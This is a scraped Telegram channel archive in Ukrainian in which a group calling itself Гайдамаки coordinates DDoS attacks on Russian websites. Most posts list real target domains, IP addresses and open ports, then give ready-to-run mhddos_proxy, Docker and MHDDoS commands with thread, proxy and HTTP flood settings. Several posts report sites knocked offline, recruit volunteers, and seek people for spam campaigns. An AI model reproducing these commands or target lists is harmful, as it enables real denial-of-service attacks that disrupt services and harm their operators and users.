cookie

Utilizamos cookies para mejorar tu experiencia de navegación. Al hacer clic en "Aceptar todo", aceptas el uso de cookies.

avatar

Гайдамаки

Discord Гайдамак: https://discord.gg/UyqBRprgZt Чат Гайдамак: https://t.me/haydamaki_chat Документація DDoS: https://t.me/haydamaki/133 Зв'язок з адмінами: @haydamak_bot

Mostrar más
El país no está especificadoEl idioma no está especificadoLa categoría no está especificada
Publicaciones publicitarias
866
Suscriptores
Sin datos24 horas
Sin datos7 días
Sin datos30 días
Archivo de publicaciones
Photo unavailableShow in Telegram
Доброго дня, Шановні Гайдамаки! Поки рашисти перетворюються на добриво для наших родючих земель та бездумно тріпають язиком про "пабєди па всєм направлєніям", ми продовжуємо чинити опір погані як на сухопутному, так і на кіберфронті. За нашою невеличкою традицією пропонуємо вам провести суботній вечір за переглядом фільму. На порядку денному Доктор Стрендж: У мультивсесвіті божевілля. Тому готуйте смаколики та підєднуйтесь у наш діскорд-канал для сумісного перегляду о 21.00. А після того вас чекатиме невеличкий сюрприз від Відьми 😉 Гарного вечора, та не забувайте нищити гадів всюди: у містах, на вулицях, форумах, в іграх, чатах, особистих повідомленнях. Нехай пам'ятають, що вони непотріб мультивсесвіту.
Mostrar todo...
Доброго дня, Шановні Гайдамаки! Продовжуємо тримати афішу. Цілі вище ☝️ Гарного полювання! Слава Україні ♥️🇺🇦
Mostrar todo...
Доброго дня, Гайдамаки!👋 Після невеликої перерви ми повертаємось до улюбленого заняття – витіснення рашистів з просторів інтернету. Нині увесь світ сприяє деградації впливу рашкостану, і простори інтернету не є виключенням. Тому, панове, вмикайте машини, готуйте гарячі напої та довбіть рашистів що є сили. Сьогодні опрацюємо сайт, який пропонує оркостанцям роботу в морі. На нашу думку, не добре, що ця погань має змогу покидати своє плем'я морськими шляхами, до того ж, заробляти на цьому. Єдиний випадок, коли орк може знаходитись у морі, це коли він на його дні, тому що він дно =) До того ж, відпрацюємо по сайту, на якому висять оголошення про "культурні місця" оркостану. Такі місця не можуть існувати. Вони нав'язують рашистам вологі фантазії, що вони частина культурного та розвиненого соціуму. (Усі ми знаємо що це не так) https://www.seajobs.ru/ 78.24.217.217 80/TCP, 325/TCP, 443/TCP, 8080/TCP, 10000/TCP afisha.ru 81.19.92.84 80/TCP, 443/TCP 81.19.92.85 80/TCP, 443/TCP 81.19.92.86 80/TCP, 443/TCP 46.243.226.126 443/TCP ================================ Команда для mhddos_proxy (Docker): docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 5000 --rpc 5000 --vpn --table ================================ Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 5000 --rpc 5000 --vpn --table ================================ Гарного полювання! Слава Україні🇺🇦♥️
Mostrar todo...
Update 17:30: Забрав одну ціль зі списку, відредагував список портів. Не вистачає потужності щоб повалити сайти повністю (поки працюють но з затримкою). Рекомендую перезапустити команду з атакою для прискорення процесу.
Mostrar todo...
Доброго дня, Гайдамаки!👋 Колишня ціль - сайт автоматизації HR був успішно вдосконалений нашими атаками та зараз перебуває у стані летаргічного сну😬 Тому сьогодні пройдемося по Zомбо-новинам рашистів, звідки вони черпають абсурд та пропаганду, перебуваючи у шизофренічному екстазі. https://mockva.ru/ 91.206.14.88 443/TCP, 9022/TCP https://rg.ru/ 194.190.176.201 22/TCP, 80/TCP, 443/TCP, 8080/TCP, 8181/TCP, 10256/TCP 194.190.176.202 22/TCP, 80/TCP, 443/TCP, 8080/TCP, 8181/TCP, 10256/TCP 194.190.176.203 22/TCP, 80/TCP, 443/TCP, 8080/TCP, 8181/TCP, 10256/TCP https://www.mk.ru/ 185.3.143.71 80/TCP, 443/TCP ================================ Команда для mhddos_proxy (Docker): docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 5000 --rpc 5000 --vpn --table ================================ Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 3000 --rpc 4000 --vpn ================================ Не забувайте, що ми створили софт, який повинен полегшити вам завдання. Особливо корисним буде для новеньких.🔥 https://t.me/haydamaki/133 Слава Україні🇺🇦♥️
Mostrar todo...
Доброго дня, Гайдамаки.🇺🇦 Сьогодні атакуємо сайт для автоматизаціії HR. Ціль: https://www.websoft.ru 185.229.9.111 137/UDP, 3387/TCP, 3389/TCP, 4443/TCP, 5357/TCP, 5985/TCP, 8011/TCP 217.65.2.187 80/TCP, 443/TCP, 3389/TCP ============================================== Команди для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 5000 --rpc 5000 --vpn --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 5000 --rpc 5000 --vpn --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://www.websoft.ru -t 5000 --rpc 5000 --http-method POST STRESS --vpn --table ============================================== Команди для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 5000 --rpc 5000 --vpn --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 5000 --rpc 5000 --vpn --table python runner.py https://www.websoft.ru -t 5000 --rpc 5000 --http-method POST STRESS --vpn --table ============================================== Рекомендуємо включати першу команду зі списку, атака по tcp списку більш пріоритетна. Також не забувайте вмикати vpn. Всім хорошого дня та мирного неба над головою.❤️
Mostrar todo...
Доброго дня, Гайдамаки!👋 Бачу рашисти ніяк не заспокояться, тому сьогодні продовжуємо атакувати сервіси перевізників. Цього разу під гарячу руку попадає сайт Корабел Ру😈 Також хочу сказати, що ми відмовились від класичного інструменту ddos, а саме MHDDoS. Працюємо тільки mhddos_proxy і mhddos_proxy (Docker), так як вони більш гнучкіші і зручніші у використанні. www.korabel.ru mail.korabel.ru reklama.korabel.ru 77.221.131.146 25/tcp | 80/tcp | 110/tcp | 143/tcp DNS-servers: 185.48.236.12 185.48.236.41 53/udp Команда для mhddos_proxy (Docker):
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_http.txt -t 3000 --rpc 3000 --http-methods STRESS POST --vpn
(вище тестова команда для стресера через флаг -с)**
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 3000 --rpc 4000 --vpn

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 2000 --rpc 3000 --vpn Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_http.txt -t 3000 --rpc 3000 --http-methods STRESS POST --vpn
(вище тестова команда для стресера через флаг -с)**
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 3000 --rpc 4000 --vpn

python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 2000 --rpc 3000 --vpn
Mostrar todo...
Схоже, що сайт... видалили? Невже рашисти не витримали DDoS атаки? Як жаль🥲 Спочатку домен пінгувався з стандартного 127.0.0.1, а потім взагалі зник. Думаю, що сайт не скоро відновлять в такому вигляді, якому він був спочатку (включаючи сео оптимізацію) — одним словом, сайт знищено. 79.142.80.195 25/tcp | 143/tcp | 3389/tcp | 5555/tcp | 8081/tcp | 8181/tcp Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 3000 --rpc 4000 --vpn

Команда для mhddos_proxy (Docker):
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 3000 --rpc 4000 --vpn

Зараз продовжуйте атаку тільки по TCP, по одній айпі, так як поштові сервери ще дихають, порти в конфігу змінено. Завтра нова ціль, так як тут вже все — як то кажуть "кирдик" :)
Mostrar todo...
Всім привіт, Гайдамаки!🙂 Сьогодні на обід (і не тільки) в нас сервіс ВТН — це сайт, на якому можна онлайн зробити заказ вантажоперевізників, налаштувати логістичні шляхи для малого бізнесу, зробити таможні оформлення на кордонах РФ, автоперевезення, авіаперевезення, морський фрахт, залізничні перевезення вантажу, небезпечні вантажі, митне оформлення, cкладська логістика і т.д. Ціль доволі цікава, тому спробуємо потримати трішки, для більшого результату. mail.vneshtrans.com www.vneshtrans.com www.ksp.vneshtrans.com 79.142.80.195 21/tcp | 25/tcp | 81/tcp | 110/tcp | 143/tcp | 443/tcp | 465/tcp | 587/tcp | 5555/tcp mail-out.vneshtrans.com 109.188.134.138 25/tcp | 80/tcp | 143/tcp | 465/tcp | 587/tcp DNS-servers: 91.217.21.20 79.142.80.196 91.217.20.20 53/udp Команда для mhddos_proxy (Docker): docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://mail.vneshtrans.com/ http://www.vneshtrans.com/ http://www.ksp.vneshtrans.com/ http://mail-out.vneshtrans.com/ https://www.vneshtrans.com/ https://www.vneshtrans.com/ru/user -t 2000 --rpc 4000 --http-methods STRESS POST --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest
 -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 3000 --rpc 4000 --http-method POST --table
(вище рекомендовані команди для DDoS)** docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 2000 --rpc 3000 --table Команда для mhddos_proxy:
python runner.py 
https://mail.vneshtrans.com/ http://www.vneshtrans.com/ http://www.ksp.vneshtrans.com/ http://mail-out.vneshtrans.com/ https://www.vneshtrans.com/ https://www.vneshtrans.com/ru/user -t 2000 --rpc 4000 --http-methods STRESS POST --table
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 3000 --rpc 4000 --http-method POST --table
(вище рекомендовані команди для DDoS)** python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 2000 --rpc 3000 --table Продовжуємо давити рашистів! Ми ніколи не забудемо, що сталося 24 лютого о 5 годині ранку.... і те, що зробили рашисти потім😡
Mostrar todo...
Photo unavailableShow in Telegram
Доброго вечора, Гайдамаки!👋 Сьогодні ми провели атаку на Дом Кадров і доволі успішно. Спочатку сайт працював з перебоями, потім на 2 години взагалі ліг, а далі вони просто поставили, щось типу "недогеоблок" навіть на саму росію. Тобто сайт не працює взагалі тепер ніде, хоча пінги йдуть. Нагадаю, що це сайт для найму робітників, по типу фріланс, але не айті, а звичайних людей.😁 Зараз немає змісту атакувати цей сервіс, тому йдемо далі. Чекайте цілей вранці вже. Також, від тепер ми починаємо перегрупування нашої команди, так як наш актив і взагалі вихлоп стали доволі малі.. наша структура зміниться. Тепер буде основний канал, чат-флудилка(той чат, який є зараз) і чат суто по ddos-питаннях — там ми будемо допомагати вам (строго без флуда). Це найбільш ефективна структура, яку доволі легко доповнювати і контролювати. І ще, в майбутньому планується створити міні команду для медіа-атак на рашистів. Дякую, що ви з нами. Слава Україні!🙏
Mostrar todo...
Доброго дня, Гайдамаки і Гайдамачки!😊 ЗАРАЗ потрібна ваша допомога - через 30хв збір людей буде закрито. Хто має бажання допомогти кіберполіції? Нам потрібно зараз назбирати з десяток людей на медіа напрямок - розсилки, спам і т.д. Задача не важка, але дуже важлива. Пишіть сюди: @haydamak_bot Все буде Україна!
Mostrar todo...
Всім привіт, друге запитання: "Коли вам зручно атакувати і в яку пору доби?". Прошу відповісти на це питання — нам потрібно скорегуватись :)Anonymous voting
  • Вранці | 06:00-09:00
  • Вранці | 09:00-12:00
  • В обід | 12:00-17:00
  • Ввечері | 17:00-20:00
  • Ввечері | 20:00-00:00
  • Вночі (ближче до початку ночі) | 00:00-03:00
  • Вночі (ближче до кінця ночі) | 03:00-06:00
  • Я не атакую останнім часом*
  • Інше... (в коментарі)
0 votes
Доброго вечора, ми з України!🇺🇦 Гайдамаки, ми продовжуємо атакувати рашистів. Цього разу під удар поставимо сайт Дом Кадров — сервіс типу "фріланс пошук роботи для малого бізнесу". Сайт доволі вразливий, тому, гадаю, проблем з цим бути не повинно. Також хочу сказати, що далі ми будемо працювати за новим графіком для більш ефективних атак при малій кількості людей, але це ще в розробці. А поки — товчем гадів!!! www.domkadrov.ru 213.189.208.250 —> сайт 21/tcp | 22/tcp | 80/tcp | 443/tcp 62.113.86.216 25/tcp | 110/tcp | 143/tcp | 587/tcp | 8010/tcp 213.189.208.252 21/tcp | 22/tcp | 80/tcp 195.2.83.38 53/udp —> DNS-server Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest http://62.113.86.216/ https://www.domkadrov.ru/candenter.php https://www.domkadrov.ru/ https://www.domkadrov.ru/publishposition.php -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table (вище рекомендовані команди для DDoS)** docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table Команда для mhddos_proxy:
python runner.py http://62.113.86.216/ https://www.domkadrov.ru/candenter.php https://www.domkadrov.ru/ https://www.domkadrov.ru/publishposition.php -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table

python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
(вище рекомендовані команди для DDoS)**
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

P.S: Будуть пости з питаннями до вас, потрібно підкорегувати наш вектор роботи.👌
Mostrar todo...
​​МАКСИМАЛЬНИЙ РЕПОСТ✊ Нам потрібні люди! Якщо хочеш допомогти країні у війні з окупантами - є хороша можливість себе реалізувати, саме на кіберфронті. Певно, що ви чули про атаки на російські сайти. Це і є наша ціль. Нанести удар по інтернет простору загарбників. Приєднуйтесь і не хвилюйтесь, все що потрібно вас навчать наші експерти. Чат Гайдамак: https://t.me/haydamaki_chat Канал Гайдамак: https://t.me/haydamaki Discord: https://discord.gg/UyqBRprgZt Бот для зв'язку: @haydamak_bot
Mostrar todo...
Всім привіт, хочу перевірити вашу активність. Останнім часом актив наш впав, так як війна виснажує, але спробуємо продовжити з новими силами, тому на вечір оголошую збір (о 20:00). Також, прошу зробити репост наступного поста, щоб зібрати більше сил.Anonymous voting
  • Я не атакую
  • Я атакую кожного дня
  • Я атакую через день
  • Я атакую кілька раз в тиждень
  • Я атакую, але з іншими угрупуваннями
  • Інший варіант... (в коментарі)
0 votes
Update 12:40: Забрав декілька цілей зі списку tcp, а саме: stab.mos.ru adc.spb.ru minfin.gov.ru Потрібно більше потужності. Рекомендую при атаці включати VPN сервера якого знаходяться в рф.
Mostrar todo...
[Переслано из Гайдамаки] Доброго ранку, Гайдамаки!✨ На сьогодні по плану DDoS департаменту фінансів та деяких політичних сайтів. Не забувайте, що ми створили софт, який повинен полегшити вам завдання. Особливо корисним буде для новеньких. https://t.me/haydamaki/133 ❗️УВАГА❗️ Рекомендуємо обновити софт для тих хто працює з mhddos_proxy на OC Linux (можна просто переустановити). Якщо коротко, то програму переписали на асинхронне підключення, що понижує потреби та підвищує ефективність софта. Не забувайте, що при включені VPN атака не грузить ваш роутер, та може підвищити потужність❗️ Цілі: stab.mos.ru 212.100.151.201 (21/TCP, 443/TCP, 1500/TCP) nalog.ru 213.59.255.110 (53/UDP) 46.61.230.203 (53/UDP) https://www.gov.spb.ru 176.97.35.2 (53/UDP) 46.47.211.5 (53/UDP) adc.spb.ru 194.58.112.165 (80, 443/TCP) 46.243.177.11 (53/UDP) 46.243.177.12 (53/UDP) https://www.admsr.ru 79.120.2.101 (22/TCP, 80/TCP, 443/TCP) 79.120.2.108 (22/TCP, 80/TCP, 443/TCP) https://www.yamalfin.ru 91.242.171.83 (80/TCP, 443/TCP) minfin.gov.ru 195.80.224.185 (443/TCP) Пріоритет - атака по tcp. Команди для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 5000 --rpc 5000 --vpn --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 5000 --rpc 5000 --vpn --table Команди для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 5000 --rpc 5000 --vpn --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 5000 --rpc 5000 --vpn --table Команди для MHDDoS: python3 start.py POST https://www.nalog.ru 6 1000 proxy.txt 10000 10000 true python3 start.py POST https://www.gov.spb.ru 6 1000 proxy.txt 10000 10000 true python3 start.py POST 194.58.112.165:443 6 1000 proxy.txt 10000 10000 true python3 start.py POST https://www.admsr.ru 6 1000 proxy.txt 10000 10000 true python3 start.py POST https://zakupki44fz.ru 6 1000 proxy.txt 10000 10000 true python3 start.py POST https://www.yamalfin.ru 6 1000 proxy.txt 10000 10000 true python3 start.py POST 195.80.224.185:443 6 1000 proxy.txt 10000 10000 true Не забувайте розповідати про нас друзям, потрібна більша кількість людей для посилення наших атак.🔥 ❗️Рекомендуємо перейти з MHDDoS на mhddos_proxy для підвищення ефективності та простішої організації атак. Всім хорошого дня, не забувайте про VPN.❤️
Mostrar todo...
Доброго ранку, Гайдамаки!✨ На сьогодні по плану DDoS декількох магазинів та департамент фінансів і економічного розвитку самари. Не забувайте, що ми створили софт, який повинен полегшити вам завдання. Особливо корисним буде для новеньких. https://t.me/haydamaki/133 Цілі: https://www.zakupki.ru 185.76.253.28 [443/TCP] https://www.officemag.ru/ 46.46.139.139 185.30.19.11 [443/tcp, 3000/tcp] https://market.mosreg.ru/ 185.169.155.145 [443/tcp] http://torgi.dfsamara.ru/ 85.140.60.116 85.140.60.117 [443/tcp] zakupki44fz.ru 87.236.22.66 [22/tcp, 80/tcp] Команди для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://www.zakupki.ru http://torgi.dfsamara.ru/ https://market.mosreg.ru/ https://www.officemag.ru/ https://zakupki44fz.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://www.zakupki.ru http://torgi.dfsamara.ru/ https://market.mosreg.ru/ https://www.officemag.ru/ https://zakupki44fz.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для MHDDoS: python3 start.py POST https://www.zakupki.ru 6 1000 proxy.txt 10000 10000 true python3 start.py POST http://torgi.dfsamara.ru/ 6 1000 proxy.txt 10000 10000 true python3 start.py POST https://market.mosreg.ru/ 6 1000 proxy.txt 10000 10000 true python3 start.py POST https://www.officemag.ru/ 6 1000 proxy.txt 10000 10000 true python3 start.py POST https://zakupki44fz.ru 6 1000 proxy.txt 10000 10000 true Не забувайте розповідати про нас друзям, потрібна більша кількість людей для посилення наших атак.🔥 Всім хорошого дня, не забувайте включати VPN.❤️
Mostrar todo...
Доброго ранку, Гайдамаки!✨ Кілька днів, ми штурмували Скородзвон, але нічого толком і не вийшло. Причина дуже проста — наших потужностей не вистачило. Саме тому я вирішив створити інструкції і програму для DDoS, яка автоматично встановлює на ваш пк mhddos_proxy і запускає його. Я думаю, що це повинно збільшити наші сили, тому що програма й справді не вимагає від вас нічого — тільки запуск.... Я все розумію, ви втомились день у день запускати ці атаки, але не забувайте, що ворог й досі на нашій землі і окупанти часто атакують нас також на кіберфронті. Також ведеться велика інформаційна війна з боку росії, тому розслаблятись НЕ МОЖНА😓 web-cloud.1ats.ru 1ats.ru 5.200.48.85 |21/tcp|25/tcp|443/tcp| |111/udp| lk.beta.1ats.ru apicrm.1ats.ru admin.beta.1ats.ru 80.76.235.51 |80/tcp|443/tcp| crm.1ats.ru 5.101.74.53 |80/tcp|443/tcp| 176.99.13.11 176.99.13.12 |53/udp| —> DNS Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://5.200.48.85/ https://web-cloud.1ats.ru/ https://1ats.ru/ https://admin.beta.1ats.ru/admin/ https://lk.beta.1ats.ru/client/#!/ http://apicrm.1ats.ru/#/signin http://crm.1ats.ru/#/signin http://5.101.74.53/#/signin -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://5.200.48.85/ https://web-cloud.1ats.ru/ https://1ats.ru/ https://admin.beta.1ats.ru/admin/ https://lk.beta.1ats.ru/client/#!/ http://apicrm.1ats.ru/#/signin http://crm.1ats.ru/#/signin http://5.101.74.53/#/signin -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table Команди для MHDDoS: python3 start.py UDP 5.200.48.85:111 5000 10000 true
python3 start.py POST https://lk.beta.1ats.ru/client/#!/ 6 1000 proxy.txt 10000 5000 true
python3 start.py POST http://crm.1ats.ru/#/signin 6 1000 proxy.txt 10000 5000 true
(вище пріорітетні команди)**
python3 start.py STRESS https://web-cloud.1ats.ru/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://1ats.ru/ 6 1000 proxy.txt 10000 5000 true
python3 start.py POST http://5.101.74.53/#/signin 6 1000 proxy.txt 10000 5000 true
python3 start.py POST http://apicrm.1ats.ru/#/signin 6 1000 proxy.txt 10000 5000 true

python3 start.py UDP 176.99.13.11:53 5000 10000 true python3 start.py UDP 176.99.13.12:53 5000 10000 true Надіюсь надалі наша потужність стане вищою, особливо з автоматичним софтом (вище інструкції). Все буде Україна!
Mostrar todo...
ГАЙДАМАКИ. ДОКУМЕНТАЦІЯ DDOS-КІБЕРАТАК. ІНСТРУКЦІЇ І МАНУАЛИ — ВСЕ В ОДНОМУ МІСЦІ :) || Гайдамаки — повна документація для DDoS кібератак (збірка) Якщо ви не розбираєтесь в програмах, якщо ваш максимум використання компютера - це посидіти в соц. мережах, браузер і офіс програми, то ваш вибір: || Windows 8/8.1 || Windows 10 || Windows 11 Вище вказані три лінки є найлегшим варіантом для здійснення кібератак. Ця програма все встановить за вас, все що потрібно — це запустити її. || Пряме посилання на завантаження програми (вище є 3 детальні інструкції до неї) Більш поглиблені інструкції для кібератак (вводити команди в консоль): || Windows —> Гайдамаки. Інструкція MHDDoS_Proxy || MacOS (Apple) —> Гайдамаки. Документація MHDDoS_Proxy || Документація MHDDoS_Proxy + Docker (стара інструкція) Зараз є документації для Windows і частково для MacOS, але з часом це все буде доповнюватись. Якщо у вас виникли питання, пишіть нам: @haydamak_bot ПИЄДНУЙСЯ ДО КІБРЕРАРМІЇ І ЗНИЩУЙ ОКУПАНТІВ НА КІБЕРФРОНТІ. ВСІ ПОТРІБНІ ПРОГРАМИ ПРЕДСТАВЛЕНІ ВИЩЕ. РАЗОМ — МИ СИЛА!
Mostrar todo...
Доброго вечора, Гайдамаки!✨ Атака на сервіси телефонії Скородзвон ру. Друзі, без коментарів — вмикайте дос атаку і погнали: Сервери на яких сайт: skorozvon.ru 78.155.195.108 [443/TCP, 30000/TCP] test-site.skorozvon.ru 185.201.47.131 [22/TCP, 111/TCP, 5432/TCP, 9100/TCP, 10012/TCP, 30000/TCP] stracker.skorozvon.ru 176.99.2.125 [8082/TCP] webinars.skorozvon.ru 185.165.123.206 [443/TCP] Поштові сервери: 91.232.196.20 [25/smtp] 91.232.196.97 [25/smtp, 110/pop3, 143/imap, 465/ssl-smtp, 2525/smtp] Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://webinars.skorozvon.ru/ https://skorozvon.ru/ https://stracker.skorozvon.ru/users/sign_in -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://webinars.skorozvon.ru/ https://skorozvon.ru/ https://stracker.skorozvon.ru/users/sign_in -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для MHDDoS:
python3 start.py STRESS https://skorozvon.ru/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://webinars.skorozvon.ru/ 6 1000 proxy.txt 10000 5000 true

python3 start.py POST https://stracker.skorozvon.ru/users/sign_in 6 1000 proxy.txt 10000 5000 true
python3 start.py POST https://webinars.skorozvon.ru/ 6 1000 proxy.txt 10000 5000 true
Mostrar todo...
Доброго вечора — ми з України!🇺🇦 Гайдамаки, останні кілька днів наша активність почала падати... Всі ми втомились кожного дня запускати скрипти і атакувати ₚусню, але все ж таки хочу нагадати вам, що війна продовжується і потрібно йти далі. Ми пам'ятаємо те, що зробили поціновувачі "руського миру" на наших землях, ми пам'ятаємо як вони гвалтували наших дівчат, навіть дітей.. Як вони стріляли з артилерійських установок по наших будинках, як вони поламали мільйони життів. Саме тому ми продовжуємо АТАКУВАТИ ОКУПАНТІВ!!!🤬 Щодо цілі, ми викурили КУБ24 з рідних серверів на клаудфлаєр захист. Я не планував продовжувати атаку більше двох днів, але все ж таки — ви молодці, змогли добити ворога. Тепер думаю вони потратили доволі кругленьку суму за бізнес тарифом (за контрактом це фінансова компанія, значить про-версія і фрі-версія їм не підходять). Так як сервіс стоїть, а гроші не йдуть, вони вирішили проблему таким шляхом. Далі нова ціль і сюрприз для тих, хто далекий від IT😏 Збір о 22.00
Mostrar todo...
Гайдамаки увага — коригування атаки!🗡 Ворог доволі стійко тимає удар, а зараз вони взагалі змінили поштовий айпі, а основний сайт під tcpwrapped (по суті закритий конекшн), що не дає нам змоги його нормально атакувати. Але все таки сайт не може працювати в такому стані, тому вони частково переїхали на іншу айпі. Пошта — повністю. Також прошу пост вище максимально репостити — в себе в чатах школи, університету, серед колег, тощо. Нам й справді не вистачає сил і потужностей, щоб взятись за ще більш серйозніші речі. finmodel.kub-24.ru mts.kub-24.ru robot.kub-24.ru dev.kub-24.ru store.kub-24.ru kub-24.ru 92.42.15.197 [filtered or tcpwrapped] 185.175.47.155 [21/TCP, 22/TCP, 80/TCP, 8083/TCP] 92.42.15.197 —> 185.175.47.155 (змінили поштовий айпі) [25/smtp, 110/pop3, 143/imap, 465/ssl-smtp, 587/smtp, 993/ssl-imap, 995/ssl-pop3, 2525/smtp] —> пошта* 185.175.47.155 188.68.203.5 77.223.114.5 188.68.203.10 77.223.114.10 [53/UDP] —> DNS-servers* Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://finmodel.kub-24.ru https://mts.kub-24.ru https://robot.kub-24.ru https://dev.kub-24.ru/site/login https://kub-24.ru https://store.kub-24.ru/site/login -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://finmodel.kub-24.ru https://mts.kub-24.ru https://robot.kub-24.ru https://dev.kub-24.ru/site/login https://kub-24.ru https://store.kub-24.ru/site/login -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table Команди для MHDDoS:
python3 start.py STRESS https://finmodel.kub-24.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://mts.kub-24.ru 6 1000 proxy.txt 10000 5000 true
